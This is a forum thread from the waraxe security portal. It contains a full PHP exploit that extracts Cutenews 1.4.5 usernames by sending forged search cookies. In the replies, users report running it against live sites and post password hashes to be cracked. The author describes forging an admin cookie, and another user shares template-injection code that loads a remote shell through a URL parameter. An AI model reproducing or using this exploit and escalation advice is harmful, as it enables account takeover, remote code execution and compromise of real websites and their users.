Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
August 21, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 198
Members: 0
Total: 198
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other software -> Cutenews <= 1.4.5 usernames fetching exploit Goto page 1, 2  Next
Post new topic  Reply to topic View previous topic :: View next topic 
Cutenews <= 1.4.5 usernames fetching exploit
PostPosted: Sun Dec 23, 2007 10:48 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Code:

<?php
error_reporting(E_ALL);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// Cutenews <= 1.4.5 usernames fetching exploit
// Version 1.1
// Written by Janek Vind "waraxe"
// http://www.waraxe.us
// 25. dec 2007
// Estonia, Tartu
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_COOKIE, so no log fear
// 3. Pretesting saves time if Cutenews is not vulnerable
//
// Version 1.1 -> pattern recognize improved
//
// More useful tools: http://www.waraxe.us/tools/
// Waraxe forums: http://www.waraxe.us/forums.html
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$target = 'http://localhost/cutenews.1.4.5/search.php';
$level = 1; // User level needed, admin is 1
$outfile = './cute_log.txt';// Log file
//=====================================================================
///////////////////////////////////////////////////////////////////////
// Don't mess below this line, unless you know the stuff ;)
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
if(($level < 1) || ($level > 4))
{
   die('Specified level is invalid!');
}
$levels = array(1=>'admin',2=>'editor',3=>'journalist',4=>'commenter');
$levelname = $levels[$level];
$start_time = time();
$users_cnt = array();
$users = array();
$requests = 0;
$cli = php_sapi_name() === 'cli';
//=====================================================================
// Warning, if executed from webserver
//=====================================================================
if(!$cli)
{
   if(!isset($_REQUEST['wtf-is-cli']))
   {
      echo "<html><head><title>Attention!</title></head>\n";
      echo "<body><br /><br /><center>\n";
      echo "<h1>Warning!</h1>\n";
      echo "This exploit is meant to be used as php CLI script!<br />\n";
      echo "More information:<br />\n";
      echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
      echo "Still, you can try to run it from webserver.<br />\n";
      echo "Just press the button below and prepare for long waiting<br />\n";
      echo "And learn to use php CLI next time, please ...<br />\n";
      echo "<form method=\"get\">\n";
      echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
      echo "</form>\n";
      echo "</center></body></html>\n";
      exit;
   }
   else
   {
      // Let's try to maximize our chances without CLI
      set_time_limit(0);
   }
}
//=====================================================================
add_logline("-------------------------------------------------------");
add_logline("Cutenews usernames fetching started");
add_logline("Target: $target");
add_logline("Reglevel: $levelname");

pre_test();
fetch_users();
$fcnt = count($users);

add_logline("Fetched $fcnt usernames with reglevel '$levelname'\n");
xecho("\nFetched $fcnt usernames with reglevel '$levelname'\n", 1);

foreach($users as $username)
{
   add_logline($username);
   xecho($username, 1);
}

$run_time = time() - $start_time;
xecho("\nTotal time spent: $run_time seconds", 1);
xecho("HTTP requests made: $requests\n", 1);
xecho("Questions and feedback - http://www.waraxe.us/forums.html", 1);
xecho("See ya! :)", 1);

exit;
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function fetch_users()
{
   global $users_cnt, $level;
   $maxlen = 15;
   $pieces = array(' ' => $users_cnt[$level]);
   
   for($i = 0; $i < $maxlen; $i ++)
   {
      $cntx = count($pieces);
      $arr = array();
      foreach($pieces as $known => $count)
      {
         $arr2 = reveal_next_char($known, $count);
         $arr = array_merge($arr, $arr2);
      }
      
      $pieces = $arr;
   }
}
///////////////////////////////////////////////////////////////////
function reveal_next_char($known, $count)
{
   global $users_cnt, $users, $level;
   
   $known = trim($known);
   $charset = 'abcdefghijklmnopqrstuvwxyz0123456789._-';
   $chars = strlen($charset);
   $out = array();
   $rl = "[$level]";
   $arr = array("$charset" => $count);
   $found_final = 0;

   while(1)
   {
      $found = 0;
      $arr2 = array();
      
      foreach($arr as $subset => $scnt)
      {
         $curr_len = intval(floor(strlen($subset) / 2));
         // Testing first half
         $fhalf = substr($subset, 0, $curr_len);
         $un = "^$known([$fhalf])";
         xecho("Testing $un");
         $matches =  make_query($un, $rl);
         if($matches > 0)
         {
            $found += $matches;
            xecho("Found $matches match(es)");
            if( strlen($fhalf) == 1)
            {
               // Exact match?
               if(test_exact_match("$known$fhalf"))
               {
                  if($matches > 1)
                  {
                     $out["$known$fhalf"] = $matches - 1;
                  }
               }
               else
               {
                  $out["$known$fhalf"] = $matches;
               }
                  
               $found_final += $matches;
            }
            else
            {
               $arr2[$fhalf] = $matches;
            }
         }

         if($matches < $scnt)
         {
            // Testing second half
            $shalf = substr($subset, $curr_len);
            $un = "^$known([$shalf])";
            xecho("Testing $un");
            $matches =  make_query($un, $rl);
            if($matches > 0)
            {
               $found += $matches;
               xecho("Found $matches match(es)");
               if( strlen($shalf) == 1)
               {
                  if(test_exact_match("$known$shalf"))
                  {
                     if($matches > 1)
                     {
                        $out["$known$fhalf"] = $matches - 1;
                     }
                  }
                  else
                  {
                     $out["$known$shalf"] = $matches;
                  }
                  
                  $found_final += $matches;
               }
               else
               {
                  $arr2[$shalf] = $matches;
               }
            }
         }
      }

      $arr = $arr2;

      if( $found_final >= $count )
      {
         break;
      }
   }

   return $out;
}
////////////////////////////////////////////////////////////////////////
function test_exact_match($un)
{
   global $level;
   
   $rl = "[$level]";
   $test = "^$un$";
   
   xecho("Testing for full match $un");
   $matches =  make_query($test, $rl);
   if($matches > 0)
   {
      xecho("Full username found: $un");
      $GLOBALS['users'][]= $un;
      return true;
   }
   
   xecho("Not full match: $un");
   return false;
}
///////////////////////////////////////////////////////////////////////
function pre_test()
{
   global $users_cnt;
   $un = "^[\.A-z0-9_\-]{1,15}\$";
   
   // Target URL valid?
   xecho("Validating target URL");
   if(strpos(make_get($GLOBALS['target']), 'search_in_archives') === false)
   {
      die('Target URL not valid!');
   }
   xecho("URL is valid");

   $rl = "[1-4]";
   $cnt_all =  make_query($un, $rl);
   if($cnt_all < 1)
   {
      die('Pretest failed - no users at all?');
   }
   else
   {
      xecho("Total $cnt_all user(s) detected:", 1);
      add_logline("Total $cnt_all user account(s)\n");
   }

   $rl = "[1]";
   $cnt_admins =  make_query($un, $rl);
   if($cnt_admins < 1)
   {
      die('Pretest failed - no admins at all?');
   }
   else
   {
      xecho("$cnt_admins admin(s)", 1);
      add_logline("$cnt_admins admin account(s)");
   }
   
   $rl = "[2]";
   $cnt_editors =  make_query($un, $rl);
   xecho("$cnt_editors editor(s)", 1);
   add_logline("$cnt_editors editor account(s)");

   $rl = "[3]";
   $cnt_journalists =  make_query($un, $rl);
   xecho("$cnt_journalists journalist(s)", 1);
   add_logline("$cnt_journalists journalist account(s)");

   $rl = "[4]";
   $cnt_commenters =  make_query($un, $rl);
   xecho("$cnt_commenters commenter(s)", 1);
   add_logline("$cnt_commenters commenter account(s)\n");
   
   if( $cnt_all === ($cnt_admins + $cnt_editors + $cnt_journalists + $cnt_commenters) )
   {
      xecho("Pretesting passed successfully - target is vulnerable!", 1);
   }
   else
   {
      die('Fetched userscounts does not match - fatal exit!');
   }
   
   $users_cnt[1] = $cnt_admins;
   $users_cnt[2] = $cnt_editors;
   $users_cnt[3] = $cnt_journalists;
   $users_cnt[4] = $cnt_commenters;
}
///////////////////////////////////////////////////////////////////////
function make_query($username, $reglevel = '')
{
   global $target;
   $max_retries = 10;
   
   $cookie = "dosearch=yes;files_arch[]=./data/users.db.php;title=$username";
   if(!empty($reglevel))
   {
      $cookie .= ";user=$reglevel";
   }
   
   
   for($retry = 0; $retry < $max_retries + 1; $retry ++)
   {
      if($retry > 0)
      {
         xecho("Request failed!\n");
         xecho("Sleeping $retry seconds\n");
         sleep($retry);
         xecho("Awake ...\n");
         xecho("Retry #$retry\n");
      }
      $buff = make_get($target, $cookie, '', true);
      $ret = preg_match('/\[[0-9]{1,6}\]:/',$buff,$hits);
      if($ret > 0)
      {
         $ret = intval(substr($hits[0], 1));
         if($ret > -1)
         {
            return $ret;
         }
      }
   }
   
   die('Fatal error - server down?');
}
///////////////////////////////////////////////////////////////////////
function make_get($url, $cookie = '', $referer = '', $headers = FALSE)
{
   $ch = curl_init();
   $timeout = 120;
   curl_setopt($ch, CURLOPT_URL, $url);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
   curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
   
   if(!empty($cookie))
   {
      curl_setopt($ch, CURLOPT_COOKIE, $cookie);
   }
 
   if(!empty($referer))
   {
      curl_setopt($ch, CURLOPT_REFERER, $referer);
   }

   if($headers === TRUE)
   {
      curl_setopt($ch, CURLOPT_HEADER, TRUE);
   }
   else
   {
      curl_setopt($ch, CURLOPT_HEADER, FALSE);
   }

   $fc = curl_exec($ch);
   curl_close($ch);
   $GLOBALS['requests'] ++;
   
   return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_logline($line)
{
   global $outfile;
   
   $line .= "\n";
   $fh = fopen($outfile, 'ab');
   fwrite($fh, $line);
   fclose($fh);
   
}
///////////////////////////////////////////////////////////////////////
function xecho($line, $both = 0)
{
   if($GLOBALS['cli'])
   {
      echo "$line\n";
   }
   elseif($both)
   {
      $line = nl2br(htmlspecialchars($line));
      echo "$line<br />\n";
   }
}
//////////////////////////////////////////////////////////////////////
?>


Feedback is welcome Cool
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Jan 19, 2008 8:30 pm Reply with quote
PoisonedV
Regular user
Regular user
 
Joined: Jan 19, 2008
Posts: 18




Hey, the script is awesome and definately helpful when trying to find out the admin. however when I did a search for level 3 accounts, it went for a little bit then stopped going. any ideas?
View user's profile Send private message
PostPosted: Sat Jan 19, 2008 8:37 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




PoisonedV wrote:
Hey, the script is awesome and definately helpful when trying to find out the admin. however when I did a search for level 3 accounts, it went for a little bit then stopped going. any ideas?


That's odd, script is supposed to work correctly in various conditions ...
Can you provide all output from start to stopping moment - just strip sensitive info before posting it. This should help to figure out the cause of problem ...
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Jan 19, 2008 9:00 pm Reply with quote
PoisonedV
Regular user
Regular user
 
Joined: Jan 19, 2008
Posts: 18




Heres the log file. Doesnt reveal much.

-------------------------------------------------------
Cutenews usernames fetching started
Target: http://xxxxx/cutenews/search.php
Reglevel: journalist
Total 12 user account(s)

1 admin account(s)
1 editor account(s)
10 journalist account(s)
0 commenter account(s)

and thats the end of the logfile. In the DOS command window, it started off fine:


but then it started acting weird and stopped

ive tried this multiple times and the same thing happens
View user's profile Send private message
PostPosted: Sat Jan 19, 2008 9:18 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Hmm, seems like some kind of bug in exploit ... maybe.
Still - you can fetch admin's username and password md5 hash and then log in as admin. With admin privileges all usernames can be seen and manipulated anyway.
I can't fix this bug without testing with real target and right now i don't have much time either.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Jan 19, 2008 9:25 pm Reply with quote
PoisonedV
Regular user
Regular user
 
Joined: Jan 19, 2008
Posts: 18




waraxe wrote:
Hmm, seems like some kind of bug in exploit ... maybe.
Still - you can fetch admin's username and password md5 hash and then log in as admin. With admin privileges all usernames can be seen and manipulated anyway.
I can't fix this bug without testing with real target and right now i don't have much time either.

Yea, its fine. asking around some people to crack the md5 hash or the admin for me, just thought maybe this could speed things up
View user's profile Send private message
PostPosted: Sat Jan 19, 2008 9:45 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




PoisonedV wrote:
waraxe wrote:
Hmm, seems like some kind of bug in exploit ... maybe.
Still - you can fetch admin's username and password md5 hash and then log in as admin. With admin privileges all usernames can be seen and manipulated anyway.
I can't fix this bug without testing with real target and right now i don't have much time either.

Yea, its fine. asking around some people to crack the md5 hash or the admin for me, just thought maybe this could speed things up


You don't need to crack the hash to get admin access to cutenews installation. You just need right cookie with hash - that's all. Cookie forgery - it may be called Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Jan 19, 2008 10:18 pm Reply with quote
PoisonedV
Regular user
Regular user
 
Joined: Jan 19, 2008
Posts: 18




Thanks for that tip. Now I can see all users even without using the script. still want to get that md5 hash cracked though. if you have time, its fad9894adff22d0cb828ce2eb4029ba1 and 04b4fe759be109523596029186c6eb58
but if not its fine
View user's profile Send private message
PostPosted: Thu Jan 24, 2008 12:05 am Reply with quote
Elewyn
Beginner
Beginner
 
Joined: Feb 03, 2006
Posts: 3




Can explain how to craft a cutenews cookie?
View user's profile Send private message Visit poster's website
PostPosted: Thu Jan 24, 2008 12:11 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Elewyn wrote:
Can explain how to craft a cutenews cookie?


Cookie must be like this:

Code:

username=admin;md5_password=1b3396f4609f652f7179bd05423c5374;


Use Firefox and cookie editor add-on and create new cookie with username and password hash, as seen above, and with domain pointing to target website. That's all Smile

And by the way - when you have cutenews admin privileges, then it's easy to get php level acess - through template editing. And if safe_mode=off, then next step can be exec(), popen(), system() and/or other shell access functions in php Smile

Basically - most of the cutenews-powered websites are just waiting for troubles ...
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu Jan 24, 2008 12:47 am Reply with quote
Elewyn
Beginner
Beginner
 
Joined: Feb 03, 2006
Posts: 3




Sorry i didn't see what you post, ready problem solve Smile
View user's profile Send private message Visit poster's website
PostPosted: Wed Jun 04, 2008 4:40 pm Reply with quote
mixman
Regular user
Regular user
 
Joined: Jun 03, 2008
Posts: 11
Location: Estonia,Tallinn




I am trying to fetch admin login name from one site what uses CuteNews 1.4.5 (atleast it sayes so @ bottom of that page)
But when i am trying to get that i got this:
Quote:
Fatal errror - server down?


But server is 100% up

Quote:
//=====================================================================
$target = 'http://www.*****.org/cutenews/search.php';
$level = 1; // User level needed, admin is 1
$outfile = './cute_log.txt';// Log file
//=====================================================================


Anyone can help me out with this?

[[edited by waraxe - no real URL-s!]]
View user's profile Send private message
PostPosted: Wed Jun 04, 2008 9:12 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




This website is probably patched, so exploit does not work.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu Jun 05, 2008 7:32 pm Reply with quote
Final
Beginner
Beginner
 
Joined: Jun 05, 2008
Posts: 3




Hello, first of all, thank you very much for this exploit and the friendly support. These two scripts worked perfectly for me.

I have a question concerning this, however:

waraxe wrote:
And by the way - when you have cutenews admin privileges, then it's easy to get php level acess - through template editing. And if safe_mode=off, then next step can be exec(), popen(), system() and/or other shell access functions in php Smile


Would you mind to explain how exactly this is possible? I have administrator access to the CuteNews and can create or edit templates. Now I would like to load my own shell up. Is it possible to do this...?

Thanks in advance,

~Final
View user's profile Send private message
PostPosted: Fri Jun 06, 2008 8:27 pm Reply with quote
mixman
Regular user
Regular user
 
Joined: Jun 03, 2008
Posts: 11
Location: Estonia,Tallinn




Final wrote:
Hello, first of all, thank you very much for this exploit and the friendly support. These two scripts worked perfectly for me.

I have a question concerning this, however:

waraxe wrote:
And by the way - when you have cutenews admin privileges, then it's easy to get php level acess - through template editing. And if safe_mode=off, then next step can be exec(), popen(), system() and/or other shell access functions in php Smile


Would you mind to explain how exactly this is possible? I have administrator access to the CuteNews and can create or edit templates. Now I would like to load my own shell up. Is it possible to do this...?

Thanks in advance,

....~Final


It seems that you can upload shell by insetring this in active template
Code:
<?php include('url to your shell here'); ?>


But dont ask me where does this shell goes, i am trying to figure this out myself also...
Perhaps template file dir???
..../cutenews/data/shell.php
but i guess you cant open file there due permissions Rolling Eyes

Edit:
ANother way should be this:
Insert this to active template:
Code:
if(isset($_GET['myshell'])) { include($_GET['myshell']); }

Later go:

Code:
http://site.com/cutenews/index.php?myshell=<URL TO SHELL HERE>


Just some ideas to test, i am very new with this, so better wait for experienced guys opinion...
View user's profile Send private message
Cutenews <= 1.4.5 usernames fetching exploit
  www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 2  
Goto page 1, 2  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Hardware reviews
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.077 Seconds